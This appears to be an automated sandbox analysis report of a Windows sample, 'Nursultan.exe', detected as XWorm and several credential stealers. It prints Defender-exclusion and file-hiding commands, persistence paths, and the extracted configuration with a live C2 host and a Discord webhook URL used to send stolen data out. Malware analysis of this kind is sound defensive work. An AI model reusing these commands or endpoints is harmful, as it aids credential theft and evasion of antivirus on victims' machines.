Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nursultan.exe

Overview

General Information

Sample name:Nursultan.exe
Analysis ID:1505919
MD5:ccfa4401df6dcaef4265f5edd06f3fde
SHA1:f96f403087bb1ad5483bc68a5a3db8a1ca833f4e
SHA256:366f08500694a72d97a16affa8009f0ff88d859807a7d2cc9533aca6d7c4faf4
Tags:exexworm
Infos:

Detection

44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected 44Caliber Stealer
Yara detected BlackGuard
Yara detected Blank Grabber
Yara detected Rags Stealer
Yara detected Umbral Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Nursultan.exe (PID: 764 cmdline: "C:\Users\user\Desktop\Nursultan.exe" MD5: CCFA4401DF6DCAEF4265F5EDD06F3FDE)
    • Nursultan.exe (PID: 2464 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
      • Nursultan2.exe (PID: 7084 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
        • cmd.exe (PID: 1240 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1272 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 2300 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • cmd.exe (PID: 6580 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 7188 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • timeout.exe (PID: 7232 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
          • mode.com (PID: 7760 cmdline: mode con: cols=103 lines=21 MD5: BEA7464830980BF7C0490307DB4FC875)
        • Insidious.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
        • Microsoft Edge.exe (PID: 2924 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
        • Umbral.exe (PID: 2316 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
          • WMIC.exe (PID: 7368 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 7892 cmdline: "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8036 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Nursultan.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
        • Nursultan2.exe (PID: 5492 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
          • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • cmd.exe (PID: 7632 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • cmd.exe (PID: 7640 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • chcp.com (PID: 7664 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • timeout.exe (PID: 7680 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • Conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • mode.com (PID: 1868 cmdline: mode con: cols=103 lines=21 MD5: BEA7464830980BF7C0490307DB4FC875)
          • Insidious.exe (PID: 7384 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
          • Microsoft Edge.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
          • Umbral.exe (PID: 7500 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
          • Conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Nursultan.exe (PID: 576 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
          • Nursultan2.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
            • cmd.exe (PID: 7804 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • cmd.exe (PID: 8052 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • chcp.com (PID: 3620 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • timeout.exe (PID: 432 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
            • Insidious.exe (PID: 7820 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
            • Microsoft Edge.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
            • Umbral.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
          • Nursultan.exe (PID: 7544 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
            • Nursultan2.exe (PID: 8044 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
              • cmd.exe (PID: 6152 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 7412 cmdline: C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • cmd.exe (PID: 6768 cmdline: C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • cmd.exe (PID: 764 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • chcp.com (PID: 576 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                • timeout.exe (PID: 2924 cmdline: timeout 4 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
              • Insidious.exe (PID: 7380 cmdline: "C:\Users\user\AppData\Local\Temp\Insidious.exe" MD5: B70C03532081C928F946E844C5D2172D)
              • Microsoft Edge.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
              • Umbral.exe (PID: 7388 cmdline: "C:\Users\user\AppData\Local\Temp\Umbral.exe" MD5: DF69E1468A4656F2EEC526DE59A89A8B)
            • Nursultan.exe (PID: 8092 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
              • Nursultan2.exe (PID: 7628 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" MD5: 0BA8218F991E81620F31083273EE7D91)
                • cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • Nursultan.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Local\Temp\Nursultan.exe" MD5: A99954BFF017983BF455DE31C5F0696A)
                • Conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Microsoft Edge.exe (PID: 3056 cmdline: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" MD5: C2A5CD7C5F8A633BAFB54B62CEE38077)
      • powershell.exe (PID: 5748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
BlackGuardAccording to Zscaler, BlackGuard has the capability to steal all types of information related to Crypto wallets, VPN, Messengers, FTP credentials, saved browser credentials, and email clients.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["stage-von.gl.at.ply.gg"], "Port": "19496", "Aes key": "234234", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: 44Caliber Stealer

{"Discord Webhook": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9\u0001Spidey Bot"}

Threatname: Umbral Stealer

{"C2 url": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9", "Version": "v1.3"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
      • 0x31f18:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
      • 0x3209e:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
      • 0x3213a:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
      C:\Users\user\AppData\Roaming\Microsoft EdgeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\Microsoft EdgeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          Click to see the 15 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
              0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UmbralStealerYara detected Umbral StealerJoe Security
                  00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RagsStealerYara detected Rags StealerJoe Security
                    Click to see the 40 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    3.0.Microsoft Edge.exe.b80000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      3.0.Microsoft Edge.exe.b80000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        3.0.Microsoft Edge.exe.b80000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                        • 0xee8a:$s6: VirtualBox
                        • 0xede8:$s8: Win32_ComputerSystem
                        • 0x11f43:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        • 0x11fe0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                        • 0x120f5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                        • 0x10bfe:$cnc4: POST / HTTP/1.1
                        0.2.Nursultan.exe.128b3a60.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                          0.2.Nursultan.exe.128b3a60.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                            Click to see the 25 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ParentProcessId: 3056, ParentProcessName: Microsoft Edge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', ProcessId: 5748, ProcessName: powershell.exe
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ParentProcessId: 3056, ParentProcessName: Microsoft Edge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', ProcessId: 5748, ProcessName: powershell.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ParentProcessId: 3056, ParentProcessName: Microsoft Edge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', ProcessId: 5748, ProcessName: powershell.exe
                            Sigma detected: Suspicious Startup Folder Persistence
                            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Umbral.exe, ProcessId: 2316, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uOWQK.scr
                            Sigma detected: Change PowerShell Policies to an Insecure Level
                            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ParentProcessId: 3056, ParentProcessName: Microsoft Edge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', ProcessId: 5748, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft Edge, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ProcessId: 3056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge
                            Sigma detected: Powershell Defender Exclusion
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ParentProcessId: 3056, ParentProcessName: Microsoft Edge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', ProcessId: 5748, ProcessName: powershell.exe
                            Sigma detected: SCR File Write Event
                            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Umbral.exe, ProcessId: 2316, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uOWQK.scr
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ProcessId: 3056, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk
                            Sigma detected: Suspicious Screensaver Binary File Creation
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Umbral.exe, ProcessId: 2316, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\uOWQK.scr
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, ParentProcessId: 3056, ParentProcessName: Microsoft Edge.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe', ProcessId: 5748, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-09-07T01:47:50.445728+020020455931A Network Trojan was detected192.168.2.549732162.159.135.232443TCP
                            2024-09-07T01:48:05.148671+020020455931A Network Trojan was detected192.168.2.549755162.159.136.232443TCP
                            2024-09-07T01:48:19.630044+020020455931A Network Trojan was detected192.168.2.549771162.159.135.232443TCP
                            2024-09-07T01:48:31.749098+020020455931A Network Trojan was detected192.168.2.549786162.159.135.232443TCP
                            2024-09-07T01:48:44.042997+020020455931A Network Trojan was detected192.168.2.549801162.159.136.232443TCP
                            2024-09-07T01:48:57.245974+020020455931A Network Trojan was detected192.168.2.549814162.159.138.232443TCP
                            2024-09-07T01:49:11.730189+020020455931A Network Trojan was detected192.168.2.549828162.159.137.232443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
